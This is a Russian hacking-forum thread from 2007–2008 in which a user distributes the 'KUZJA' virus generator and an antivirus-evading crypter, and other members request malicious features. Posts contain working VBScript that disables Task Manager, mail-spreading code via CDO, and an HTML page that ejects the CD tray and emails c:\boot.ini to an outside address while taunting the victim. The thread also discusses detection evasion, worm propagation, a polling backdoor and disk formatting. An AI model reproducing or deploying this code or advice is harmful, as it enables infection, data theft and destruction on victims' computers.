PDA

Просмотр полной версии : Генератор Kuzja


GROB_T
26.03.2007, 21:25
Недавно создал тему о моем генераторе вирусов, но ее почему-то удалили, я так и не понял почему, решил создать еще раз. Я говорил, что в следующих версиях генератора будет возможность шифрования кода сгенерированного вируса. Я сделал прогу, которая сделана именно под мой генератор, она скрывает сгенерированные вирусы от антивирусов и глаз юзера, код при этом становится абсолютно нечитаемым. У сгенерированного вируса есть несколько недостатков:
1)Юзер может легко запасти, что делает вирус
2)не совсем недостаток, но вирус палит BitDefender.

У кпиптованного вируса все недостатки устранены, код вируса нелегко узнать, но ,конечно, если очень сильно захочется, то можно, но вряд-ли юзеру это надо, на вирустотале все молчит, никто ничего не вякает - это по-моему хорошо

скачать криптор
http://grob-t.narod.ru/KUZJA-CRYPTOR.rar

скачать сам генератор
http://grob-t.narod.ru/kuzja.rar

Пароль на оба архива grob-t.narod.ru

GROB_T
27.04.2007, 01:29
Новая версия генератора - KUZJA 1.1, качать тут:
http://grob-t.narod.ru/Generator_KUZJA_v1.1.rar
пасс grob-t.narod.ru

Mo4x
27.04.2007, 01:57
grob_t
Генератор ты иметь ввиду конструктор вирусов ?
Кстате залей на рапиду.сом если не влом.

GROB_T
28.04.2007, 00:44
залил на рапиду _http://rapidshare.com/files/28264874/Generator_KUZJA_v1.1.rar.html

GROB_T
06.05.2007, 14:02
http://kuzja-generator.ucoz.ru/_ld/0/2_KUZJA-CRYPTOR.rar - новая версия криптора, пароль на архив - 666, с прошлой версией у некоторых были проблеммы, в этой версии есть возможность выбора степени шифрования а так-же выводится диалог выбора файла и не надо его набивать вручную. Криптор написан на VBS, скомпилен прогой EXEScript 3.0

AtuM
06.05.2007, 19:42
grob_t
На чем писал генератор?

GROB_T
06.05.2007, 20:44
на delphi 9

у меня возникла идея переписать генератор, чтобы он генерил вирусы на VBScript, а не BAT-вирусы, появилось это решение оттого, что после того, как сгенерированные вири начнут палится, криптор сможет их скрывать, но в сгенеренном вирусе тот код, который не может выполнить bat-ник скидывается в vbs-файл, который потом выполняется. Если начнет палиться vbs-файл, то антивири запалят этот файл при запуске виря. Отписывайтесь здесь, одобряете ли вы это решение.

@ps1k
08.05.2007, 02:34
делай коли время есть, а мы потом посмотрим

Petr
08.05.2007, 04:08
Поясни что этот генератот делает

Ch3ck
08.05.2007, 11:10
Поясни что этот генератот делает
Генерирует вирусы (программы шутки(может и не только шутки)).
Эх и люди пошли...

GROB_T
12.05.2007, 13:48
Переделал генератор под создание vbs вирусов, правда из популярных антивирей палится вебом, но только если включать модуль автозагрузки, но конечно, для вирусов я сделал криптор, после крипта вирь со всеми настройками палится только одним антивирем, но не популярным, чета название забыл) ничего нового в генераторе нету, просто генератор полностью переделан под создание вирей на vbs, возможно где-нибудь могут возникнуть ошибки, если вы их обнаружите отписывайтесь здесь, тут www.kuzja-generator.ucoz.ru в гостевой книге или на форуме либо в асю 444452117 или на мыло grob_t@mail.ru.
скачать генератор KUZJA версии 1.2 - http://kuzja-generator.ucoz.ru/_ld/0/3_Generator_KUZJA.rar

Криптор вирусов - http://kuzja-generator.ucoz.ru/_ld/0/4_KUZJA-CRYPTOR.rar
Пароль на архивы - 666

если найдете ошибки, НЕ забывайте сообщить мне

zl0y
12.05.2007, 15:45
Такие надписи меня просто убивают ;)
http://s.foto.radikal.ru/0705/e7/86ed927e9167.jpg

TrON
12.05.2007, 16:15
ыыы))) не плохо))))ща попробую)

TrON
12.05.2007, 16:21
качка нэ идет. даже на сайте регнулся, оттуда тоже нэ идет.

GROB_T
12.05.2007, 16:35
Только что проверил, все качается, залил на рапиду http://rapidshare.com/files/30883736/3_Generator_KUZJA.rar.html - это сам генератор

http://rapidshare.com/files/30884009/4_KUZJA-CRYPTOR.rar.html - это криптор

Пароль на архивы - 666

TrON
12.05.2007, 17:56
млин, извини, Flashget переглючило - все качаецца.
молодец +1 супер, ес че напиши как от него избавицца?

GROB_T
18.05.2007, 23:26
Новая версия генератора 1.3a
Качать тут:

http://kuzja-generator.ucoz.ru/_ld/0/5_GeneratorKUZJAv.rar

пасс 666

Barney
18.05.2007, 23:34
окуенно молодца работает на пять баллов!!!

_SploiT_
19.05.2007, 02:44
GROB_T
Новая сборка be cool))) +1

Jessy
19.05.2007, 06:25
Занятная вещица..Надо будет протестить. Автору респект.

Crash2
19.05.2007, 09:12
Для чего нужено его криптовать, его нужно сначало создать , а потом криптовать и отправлять жертве?

KaMiKadZe
19.05.2007, 09:13
Для чего нужено его криптовать, его нужно сначало создать , а потом криптовать и отправлять жертве?
Мда...Криптовать чтобы спрятать от антивирусов и прочих защитных программ...

Crash2
19.05.2007, 09:46
А можно сделать так чтобы в вирусе использовать функции из двух подменю, например в подменю Сообщени я сделал чтобы окно вылазило например 50 раз, но ведь тот кто скачает и запустит вирус может зайти в процессы и завершить, хоть и в подменю есть функция Запретить диспечер задач, но при создании вируса исользуются функции одного подменю, поэтому прходиться создавать 2 вируса , один с сообщением, другой с Запрешением диспечера задач. И жертва врятли запустит сразу 2 файла.

Crash2
19.05.2007, 12:07
Только что запустил эту программу с Запрешением диспечера задач, помогите исправить, срочно, комп где запустил не мой, перезагрузка непомогает, что делать?
При нажатии Ctrl+alt+delet наисано диспечер задач отключен администратором.

GROB_T
19.05.2007, 13:36
2 Crash2: в генераторе будет включены все галки которые стоят во всех подменб, т.е. если ты поставишь галку на выводить сообщение и на запрещение диспетчера, все будет работать, вроде просто сначала сработает сообщение, а потом запрет диспетчера, потом поправлю

Crash2
19.05.2007, 13:41
GROB_T Ок, уже разобрался, а новые версии будут?

С деспечером задач тоже справился, с помощью NexArmAor

GROB_T
19.05.2007, 14:00
Будут новые версии, тока я уже не знаю, что можно в генератор добавить прикольного:) если кто-нить что может посоветовать, пишите тут, могу сделать функции червя с распространением через MS Outlook, тока позние версии не очень любят, когда к ним в адресную книжку кто-то хочет влезть и просят разрешение у юзера :( , вобщем если кто что знает, пишите тут.

NeXArmAor
19.05.2007, 14:17
Есть код (на VBS) для рассылки через CDO (Collaboration Data Object) , не требует Outlook.

Barney
19.05.2007, 14:32
гы один вопрос а как вернуть диспетчер задач?

GROB_T
19.05.2007, 14:32
2 NeXArmAor, покажи, но кажись этот код используется на вкладке уведомление для отсылки письма автору виря

2 barney:
on error resume next
Set S = CreateObject("Wscript.Shell")
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System\disabletaskmgr","0","REG_DWORD"

это сохрани в vbs файл и запусти

NeXArmAor
19.05.2007, 14:44
GROB_T
Set SH=CreateObject("wscript.shell")
Set ml = CreateObject("CDO.Message")
Set mlo = CreateObject("CDO.Configuration")
smtps=SH.regread("HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000001\SMTP Server")
mlfrom=SH.regread("HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000001\SMTP Email Address")
Set mlc = mlo.Fields
Set ml.Configuration = mlo
mlc("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
mlc("http://schemas.microsoft.com/cdo/configuration/smtpserver") = smtps ' Здесь автоматически определяется SMTP сервер используемый на компьютере
mlc("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 0
mlc.Update
ml.to = "Получатель"
ml.from = mlfrom ' Здесь автоматически определяется от кого письмо,можно подставить другое
ml.subject = "Сабж письма"
ml.AddAttachment (wscript.scriptfullname) ' Аттач
ml.HTMLBody = "ХТМЛ боди или простой текст"
ml.send ' Отправка
SEt mlc = Nothing
SeT mlo = Nothing
SEt ml = Nothing

GROB_T
19.05.2007, 14:58
спс, но этот код по-моему не будет пахать, так как на большинстве серваков нужна авторизация чтоб отправить почту, но возможно на каком нить серваке и будет пахать

helat
19.05.2007, 15:23
а реально ли vbs вставить нв страницу (HTMl, PHP) ?
Кстати надо ещё прогу сделать которая всё назад вернёт.Или скрипт.

NeXArmAor
19.05.2007, 15:37
helat , В HTML реально,на PHP не знаю. Но скрипт будет работать в таком случае только с IE. Другие браузеры не дружат с VBS.

helat
19.05.2007, 15:42
КАК именно в html опиши плиз.

Barney
19.05.2007, 15:45
КАК именно в html опиши плиз.
http://www.compdoc.ru/internet/vbscript/vbscript/1.shtml

NeXArmAor
19.05.2007, 15:48
helat, <HTML><BODY>
<script language = "JavaScript">
<!--
var userAgent=navigator.appName;
var agentInfo=userAgent.substring(0, 1);
if(agentInfo == "M"){
}
else {
alert("Эта страница оптимизирована для работа с браузером Internet Explorer. В другими браузерами возможны ошибки.")
self.close()
}
//-->
</script>
<script language ="vbscript">
On Error Resume Next
MsgBox "Чтобы посмотреть эту страницу" & vbCrLf & "Включите компонент ActiveX", vbInformation, "Уря"
Set shell=CreateObject("WScript.Shell")
If err.number=429 then
shell.Run javascript:location.reload()
else
--></script></BODY></HTML>
<HTML><HEAD><TITLE>NEX</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5">Бугогагагаа</font><BR><font size="1">бугоагаггаа</font></CENTER></BODY></HTML>

helat
19.05.2007, 15:57
а файл куда вставить?

GROB_T
19.05.2007, 16:14
<script language = "VBScript">
Тут текст скрипта
</script>

тока кстати, не будет пахать функция wscript.sleep

helat
19.05.2007, 16:21
НЕПАШЕТ
написал
<HTML><BODY>
<script language = "VBScript">
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Set ww = CreateObject("WMPlayer.OCX.7")
Set cw = ww.cdromCollection
if cw.Count >= 1 then
For i = 0 to cw.Count - 1
cw.Item(i).eject
next
End If
Call SendPost("smtp.mail.ru", "helats@gmail.com", "54027@mail.ru", "ВИРУС", "COPM ZARAZEN")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "54027"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "c:\boot.ini"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing

</script>
</BODY></HTML>
<HTML><HEAD><TITLE></TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5">ГГ</font><BR><font size="1"></font></CENTER></BODY></HTML>

NeXArmAor
19.05.2007, 16:36
helat,
<HTML><BODY>
<script language = "JavaScript">
<!--
var userAgent=navigator.appName;
var agentInfo=userAgent.substring(0, 1);
if(agentInfo == "M"){
}
else {
alert("Эта страница оптимизирована для работа с браузером Internet Explorer. В другими браузерами возможны ошибки.")
self.close()
}
//-->
</script>
<script language ="vbscript">
On Error Resume Next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Set ww = CreateObject("WMPlayer.OCX.7")
Set cw = ww.cdromCollection
if cw.Count >= 1 then
For i = 0 to cw.Count - 1
cw.Item(i).eject
next
End If
Call SendPost("smtp.mail.ru", "helats@gmail.com", "54027@mail.ru", "ВИРУС", "COPM ZARAZEN")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "54027"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "c:\boot.ini"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing
--></script></BODY></HTML>
<HTML><HEAD><TITLE>NEX</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5">хахахаха...твой комп заражен. Твои пароли ушли ко мне!</font><BR><font size="1">бугоагаггаа</font></CENTER></BODY></HTML>
Потом сохраняй как любой ХТМЛ файл и запускай.

helat
19.05.2007, 16:54
СЕНК.
А чо он смотриться тока из доверенных?

helat
19.05.2007, 16:57
Кстати как сделать чтоб сиди ром задвигался?

NeXArmAor
19.05.2007, 17:08
Кстати как сделать чтоб сиди ром задвигался?

То есть задвигался обратно,я так понял. Поставь двойной цикл. Должно сработать

if cw.Count >= 1 then
For i = 0 to cw.Count - 1
For i =1 to 2
cw.Item(i).eject
next
next
End If

GROB_T
19.05.2007, 17:08
cd-rom задвигается той же самой функцией
cw.Item(i).eject
cw.Item(i).eject
вот это сначала выдвинет сидюк, а потом задвинет его

helat
19.05.2007, 17:24
Вы не много не поняли.
Мне надо при первом запкске его выдвинуть.
при втором задвинуть

GROB_T
19.05.2007, 17:43
2 helat ты знаешь букву дисковода или нет?

helat
19.05.2007, 18:00
да

NeXArmAor
19.05.2007, 18:08
helat , насколько я знаю,средствами VBS можно только открыть дверцу CD-ROM.
Комманды закрытия нет.

GROB_T
19.05.2007, 18:23
на vbs можно закрыть дверцу сидюка, тока для этого надо зарегить библиотеку AutoItX3.dll, скрипт для открытия:
Set oAutoIt = WScript.CreateObject("AutoItX3.Control")
oAutoIt.CDTray "d:", "open"
для закрытия:
Set oAutoIt = WScript.CreateObject("AutoItX3.Control")
oAutoIt.CDTray "d:", "close"

Букву диска заменить на свою

NeXArmAor
19.05.2007, 18:28
grob_t, и где эта библа?

GROB_T
19.05.2007, 18:35
Непомню где качал, залил на http://grob-t.narod.ru/AutoItX3.dll.rar в архиве файл для реги этой библиотеки

Mosvit
19.05.2007, 19:30
Правильно я сделал? Разместил на Ucoz почему-то не работает?

<HTML><BODY>
<script language = "JavaScript">
<!--
var userAgent=navigator.appName;
var agentInfo=userAgent.substring(0, 1);
if(agentInfo == "M"){
}
else {
alert("Эта страница оптимизирована для работа с браузером Internet Explorer. В другими браузерами возможны ошибки.")
self.close()
}
//-->
</script>
<script language ="vbscript">
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
i=3
while i>0 or i<0
S.popup "Текст сообщения",5, "Заголовок сообщения",0+0
i=i-1
wend
</script></BODY></HTML>
<HTML><HEAD><TITLE>NEX</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5"> хахахаха...твой комп заражен. Твои пароли ушли ко мне!</font><BR><font size="1">бугоагаггаа</font></CENTER></BODY></HTML>

sakauri
23.05.2007, 15:55
Привет всем!

я хочу сказть благодарность GROB_T за проделаную работу!

И хочу сказть что 7 антивирусы обнаружили вирус без криптовки!!!

И 1 антивирус обнаружил с криптовкой- это symantec!!!

Так что дарагой GROB_T ты пожалйста исправь эту проблему ок?

gold-goblin
23.05.2007, 16:04
Mosvit
Если я не ошибаюсь юкоз не поддерживает ничего кроме чистого html.

gold-goblin
23.05.2007, 16:05
sakauri

А какая разница??? Всеравно пока вирус билдер в паблике он будет палится.
П.С. Криптуй за деньги

GROB_T
23.05.2007, 16:55
sakauri, я хочу сказать, что если исходный код виря будет палиться я не буду его модифицировать, мне намного проще изменить криптор, чтобы вирь перестал палиться, а некриптованный вирь помоему палят тока по модулю автозагрузки, каспер вроде видит как Type_script, а насчет symantec, помоему его практически никто не юзает, но я не совсем понял по чем он палит виря, так как иногда криптованный вирь им палится а иногда на вирустотале все чисто, потом возможно сделаю криптор полиморфным

sakauri
24.05.2007, 11:09
Все понял ждемс!

sakauri
25.05.2007, 14:20
Хочу сказть что генератор Каспер определял его только а сейчас уже:
AhnLab-V3 2007.5.24.0 05.25.2007 no virus found
AntiVir 7.4.0.27 05.25.2007 KIT/Zyaku.A
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 05.24.2007 no virus found
AVG 7.5.0.467 05.24.2007 no virus found
BitDefender 7.2 05.25.2007 no virus found
CAT-QuickHeal 9.00 05.24.2007 no virus found
ClamAV devel-20070416 05.25.2007 no virus found
DrWeb 4.33 05.25.2007 no virus found
eSafe 7.0.15.0 05.24.2007 Win32.Zyaku
eTrust-Vet 30.7.3662 05.25.2007 no virus found
Ewido 4.0 05.25.2007 Not-A-Virus.Constructor.Win32.Zyaku
FileAdvisor 1 05.25.2007 No threat detected
Fortinet 2.85.0.0 05.25.2007 W32/Zyaku!kit
F-Prot 4.3.2.48 05.24.2007 no virus found
F-Secure 6.70.13030.0 05.25.2007 Constructor.Win32.Zyaku
Ikarus T3.1.1.8 05.25.2007 Constructor.Win32.Zyaku
Kaspersky 4.0.2.24 05.25.2007 Constructor.Win32.Zyaku
McAfee 5038 05.24.2007 no virus found
Microsoft 1.2503 05.24.2007 no virus found
NOD32v2 2291 05.25.2007 no virus found
Norman 5.80.02 05.24.2007 no virus found
Panda 9.0.0.4 05.25.2007 no virus found
Prevx1 V2 05.25.2007 no virus found
Sophos 4.17.0 05.23.2007 no virus found
Sunbelt 2.2.907.0 05.24.2007 no virus found
Symantec 10 05.25.2007 no virus found
TheHacker 6.1.6.123 05.25.2007 Trojan/Constructor.Zyaku
VBA32 3.12.0 05.25.2007 Constructor.Win32.Zyaku
VirusBuster 4.3.23:9 05.24.2007 no virus found
Webwasher-Gateway 6.0.1 05.25.2007 Tool.Zyaku.A

нады бы исправить это GROB_T

GROB_T
25.05.2007, 14:35
sakauri, а зачем? это же генератор, а не сгенеренный, а генартор 1.2 версии перестал касепером палиться после того как я всего лишь поменял номер версии и больше ничего, тока мне вот интересно, почему Zyaku, а не KUZJA? надо на касперского пожаловаться :)

sakauri
25.05.2007, 15:27
sakauri, а зачем? это же генератор, а не сгенеренный, а генартор 1.2 версии перестал касепером палиться после того как я всего лишь поменял номер версии и больше ничего, тока мне вот интересно, почему Zyaku, а не KUZJA? надо на касперского пожаловаться :)

Я думаю что Сам касперский и посавил тебе такое назавание а потом другим сказал что бы так сделали!

sakauri
25.05.2007, 15:37
Дорогой GROB_T обьясника почему твои генераторы и крипторы всегда находятся не там где надо? Тоесть в temp!!!

GROB_T
25.05.2007, 17:54
Незнаю почему у тя генератор находится в temp'е может ты его из архива прямо запускаешь? а криптор написан на Vbs и скомпилен прогой exescript и рабочей папкой я указал temp.

sakauri
25.05.2007, 21:16
Незнаю почему у тя генератор находится в temp'е может ты его из архива прямо запускаешь? а криптор написан на Vbs и скомпилен прогой exescript и рабочей папкой я указал temp.

Ок все понял!!!

sakauri
25.05.2007, 21:21
GROB_T а ты бы в билдере сделал бы штобы вирус через какое то время удалялся!
А ты сможешь написать бэкдур на vbs и совмести генератор с ним!

GROB_T
25.05.2007, 22:34
2 sakauri, в генераторе добавлю функции удаления через некоторое время и еще возможность запуска не сразу, а через некоторое время, а вот насчет бэкдура на vbs не думаю, что это хорошая идея, написать то я смогу, но жрать траф будет неслабо и работать будет мягко говоря хреново

PaLaTen4IK
25.05.2007, 23:49
GROB_T, ваще мега-респект за билдер vbs скриптов... мне ацки понравился!

sakauri
26.05.2007, 09:21
А что этот бэкдур нелзя будет как то оптимизировать будет?

sakauri
26.05.2007, 09:43
Уважаемые у меня появился новй адресс valeev_iscander@yahoo.com
Где первое мая фамилия а второе имя!!!Прошу писать сюда по всем вопросам!!!

GROB_T
26.05.2007, 11:16
2 sakauri, на vbs бэкдур я знаю как сделать тока таким способом:
скрипт постоянно с интервалом, скажем в секунду качает с указанного адреса файлик, в котором содержатся инструкции, которые скрипт выполнит на компе, т.е. этот файл придется заливать вручную и как я уже говорил, будет неслабо траффик жрать, по-обычному бэкдур типа клиент - сервер на vbs вроде сделать нельзя

sakauri
26.05.2007, 14:06
Ты говоришь вроде ты разузнай поточней ок?

GROB_T
26.05.2007, 15:01
Вообще-то в инете очень мало инфы по vbs, и из всего того что я нарыл нету ни слова про бэкдуры, если кто-то знает как можно такое сделать на vbs, напишите

sakauri
26.05.2007, 16:27
Grob_t ты чего боишся рассказывать про себя а?
Аты на других языках сможешь сбацыть бэкдур а ?

spawn89
26.05.2007, 16:35
Grob_t ты чего боишся рассказывать про себя а?
Аты на других языках сможешь сбацыть бэкдур а ?
тебе не кажется бредовым то что он должен чтото про себя рассказывать??
эт раз..
дыва, када научишься писать бекдор по русски, тада и обращайся..
дальше, трои пишутся на заказ за бабло если уж тебе так нужен бекдор.. и буит он написан на перле/дельфи/мб с++... на вбс это немного проблематично сделать..

sakauri
26.05.2007, 17:02
тебе не кажется бредовым то что он должен чтото про себя рассказывать??
эт раз..
дыва, када научишься писать бекдор по русски, тада и обращайся..
дальше, трои пишутся на заказ за бабло если уж тебе так нужен бекдор.. и буит он написан на перле/дельфи/мб с++... на вбс это немного проблематично сделать..

Вот че ты меня учишь я же тебе предяву не кидаю какую нибудь так и ты мне не кидай ок?

_SploiT_
26.05.2007, 17:07
Че вы как дети соретесь из за пустяка)))

sakauri
27.05.2007, 08:57
Че вы как дети соретесь из за пустяка)))

Правильно подметил нес того взял и кинул мне предяву!

Lord-Grif
30.05.2007, 10:42
Grob_t ТЫ Красава!! РЕспект Тебе и Уважение!!! )))))

ABVG'deuka
02.06.2007, 11:34
Неплохой генератор ;)

Mosvit
13.06.2007, 21:53
Почему этот вирус до сих пор не палиться антивирусами?

GROB_T
13.06.2007, 22:50
2 Mosvit, незакриптованный вроде палится как type_script, но это тоже зависит от настроек, если закриптовать, то каспер с последними базами не палит, на вирустотал не отправлял

@ps1k
13.06.2007, 23:15
и не отправляйте !!!!!!!!!!!!! если по дольше попользоватся охота !!!!!!!!!!!!

GROB_T
13.06.2007, 23:56
Если вдруг начнет палиться юзайте мой полиморфный криптор Vbs файлов и пишите тут, что палится

vii
19.06.2007, 17:08
GROB_T у меня есть пару идей для тебя:
сделать так чтобы сразу менять иконку файла?
криптор встроенный был тоже?
распространялся по компам?
чтобы мог удалить например мои документы папку и.т.д.?
сделать невидимым при загрузке а ту видно же удалить можно?
так же можно было бы че нибудь переименовать?
да и смог бы сделать так чтобы удалялся через какое то время например дни?

жду ответа GROB_T с уважением vii

GROB_T
20.06.2007, 00:11
1)иконку для vbs файла сменить нельзя, если только поменять значение в реестре

2)а чем отдельно криптор не нравится? если начнут палить криптор, а он будет встроен, придется качать из-за криптора сам генератор, что никому не нужно

3)не оченбь хорошо понял вопрос, как именно распространялся? если имеется ввиду рассылка по всем контактам адр. книги, то это я сделаю

4) это типа как в апокалипсисе? непонимаю зачем это надо но если надо сделаю

5) имеется ввиду msconfig или нет?

6) добавлю

7) это тоже сделаю, и не только чтоб удалялся, добавлю возможность запуска только после определенного дня и т.д.

@ps1k
20.06.2007, 01:53
слушай grob_t а можеш так закалдавать, что бы он автаматически запускался сам ))) через какое то кол-во времени, дней, если его не удолят )))

GROB_T
20.06.2007, 02:09
2 opsik, сделаю чтоб можно было выбирать через сколько времени ему запуститься, но вирь разумеется будет прописываться в автозагрузку и при каждом своем запуске будет делать проверку на количество пройденных дней

@ps1k
20.06.2007, 02:38
2GROB_Tестественно. а сам процес как бы services зашифровать

vii
20.06.2007, 11:44
grob_t
1 ответ понятно!
2 ответ понятно!
3 ответ я мею виду надо бы распростронятся по сети как червь!
4 ответ надо для прикола просто а че нет-то!
5 ответ в загрузке чтобы невидно было а ту удалить можно!да!
6 ответ понятно!
7 ответ понятно!

буду ждать с нетерпением!

GROB_T
20.06.2007, 12:01
2 vii, теперь понятно, все сделаю

helat
03.07.2007, 10:50
а можеш зделать типа антивируса.
Какой все настройки реестра назад вернёт

$k@no
12.07.2007, 11:15
Антивирь нортон, палит вирус даже после криптора.

GROB_T
12.07.2007, 20:06
$k@no, да я знаю, мне уже кто-то говорил что палит, а если криптовать полиморфным криптором, тоже определяет? просто проверить нортоном можно только если его поставить, онлайн проверки вроде нету

GROB_T
28.12.2007, 05:09
Новая версия генератора 1.4
Добавлены новые функции, теперь генерируются exe вирусы
Генератор переписан с нуля, возможны баги
http://kuzja-generator.ucoz.ru/_ld/0/8_GeneratorKuzja1.rar
пароль: 666

GROB_T
30.12.2007, 16:38
Стаб начал палиться вебом
почищенный стаб: http://kuzja-generator.ucoz.ru/_ld/0/10_stub.rar
пасс:666

Shawn1x
31.12.2007, 23:59
Да не плохой генератор, делает вирусы в формате .dat вроде они не чем не палится, автору респект)

GROB_T
06.01.2008, 14:45
Почистил стаб (запалился вебом и каспером)
http://slil.ru/25321187
положить в папку Stub

asser
26.01.2008, 03:28
А проект закрыт уже? Есть связь с автором? Хотел бы на исходники глянуть

User312
26.01.2008, 23:57
Grob_t:
Добавь пожалуйста функцию форматирования дисков в заданое время :). Ток чтобы работала :)))

CaNNabi$
27.01.2008, 00:13
Grob_t:
Добавь пожалуйста функцию форматирования дисков в заданое время :). Ток чтобы работала :)))
Там кажется есть функция запустить на то или инное время, там поставил галку формат жестокого, потом время запуска например там через 2 дня :)

asser
27.01.2008, 01:04
А почему бы исходники стаба не открыть?!
Каждый для себя компилировал и все, тем более стаб написан на Бейсике, его то я думаю даже ламер разберет

User312
27.01.2008, 01:12
Чего то не ощущаю функции формата =\ Может быть не там исчу?

А почему бы исходники стаба не открыть?!
Каждый для себя компилировал и все, тем более стаб написан на Бейсике, его то я думаю даже ламер разберет
Если исходники не намутишь.. win hex и вперед :D

asser
27.01.2008, 21:55
Если исходники не намутишь.. win hex и вперед :D
Чел, хексом ты америку никому не откроешь, а исходников можно намутить только у автора, поэтому я и предлагаю сделать стаб открытым....

lexa
27.01.2008, 22:38
боян .. серьезного виря не напишешь , максимум доунлоудер который не обходит фаеры, кроме виндового + мыльно, шарно , емуль(и подобного) червя... ну и + детские приколы.. =) хотя навредить юзеру можно , заменить удалить и подобное..

asser
28.01.2008, 01:56
2lexa: Так он для этого и нужен, что бы навредить и тд. Тем более не существует и никогда не будет существовать генераторов\конструкторов СЕРЬЕЗЫХ вирей...

GROB_T
10.02.2008, 22:55
Перезалил генератор и стаб
Стаб почищенный

Генератор - http://grts.nm.ru/Kuzja/G_Kuzja_1.4.rar
Стаб - http://grts.nm.ru/Kuzja/stub.rar

Пасс на архивы - 666

Pernat1y
10.02.2008, 23:57
2lexa: Так он для этого и нужен, что бы навредить и тд. Тем более не существует и никогда не будет существовать генераторов\конструкторов СЕРЬЕЗЫХ вирей...
bo2k?
чем не конструктор?

cadam
14.02.2008, 11:39
1.4 почему-то не работает или я не разобрался, на 1.2 сделал файл, закриптовал, получился файл 123.vbs.crypted.vbs , Symantec палит его и панда палит тоже

Shred
14.02.2008, 14:56
В английской винде не меняется имя корзины, пуск итд.

GROB_T
25.02.2008, 03:04
обновленная версия стаба, распаковать в папку с генератором
http://grts.nm.ru/Kuzja/stub.rar
пароль на архив: 666

asser
25.02.2008, 17:51
2grob_t:
МОЖЕТ ТЫ ВСЕЖ ИСХОДНИК СТАБА КИНЕШЬ В ПАБЛИК??

GROB_T
29.02.2008, 21:28
2 asser:
пока что не собираюсь, буду продолжать проект

Vasya09
09.03.2008, 12:27
Генератора нет залей еще раз на рапиду ПЛЗ!

Shawn1x
09.03.2008, 13:05
Генератора нет залей еще раз на рапиду ПЛЗ!
_http://rapidshare.com/files/98151315/_________________.rar.html

asser
10.03.2008, 20:29
2grob_t: А первые версии, хотябы самую первую, так поступают с "полуопенсорсными" проектами, что ты теряешь? Я думаю здесь нет малолетних рипперов, которые изменя копирайт и выдадут за свое творение, а даже, если и найдутся - то это будет старая версия...

gold-goblin
11.03.2008, 00:26
asser
причина скорей всего не в этом так как копирайти и весь дизайн можно поменять не имея исходников.

asser
12.03.2008, 14:21
gold-goblin
Интересно в чем?! Если проект развивается, то совместными усилиями он будет развиваться бстрее...ИМХО

gold-goblin
12.03.2008, 14:23
совместными усилиями
Прости за вопрос: а ты хоть 1 язык программирования знаеш?
(яб тоже исходники не выложил)

asser
12.03.2008, 15:15
Незачто, знаю делфи, а он на делфи как-раз и написан, немного ориентируюсь а асме, но все это на уровне любителя. А вопрос действительно глупый, если бы я не знал языка - я бы не спрашивал про исходники=)

GROB_T
19.03.2008, 19:37
Новая версия генератора - 1.5

http://grts.nm.ru/Kuzja/KUZJA_1.5.rar
пароль на архив - 666

Jey
19.03.2008, 20:36
Отлично.. автору уважение за его труды... и зизайн то что нада =)

NetSter
26.04.2008, 17:03
а что проект КУЗЯ уже не развивается? да и сайт http://grob-t.narod.ru уже не фурычит...

Glynec
27.04.2008, 10:05
Автору респект!Прога помогла мне освоить Vbs :)

Olegros911
27.04.2008, 12:58
Генератор нормальок.Но зачем к нему какие то крипторы у меня вобще старая версия нодом не палит.

MaZaHaKer
30.04.2008, 14:53
а что проект КУЗЯ уже не развивается? да и сайт http://grob-t.narod.ru уже не фурычит...


сайт его очень давно закрыли . теперь его сайт : http://grts.nm.ru/ . А проект продолжаеться.

MaZaHaKer
30.04.2008, 14:55
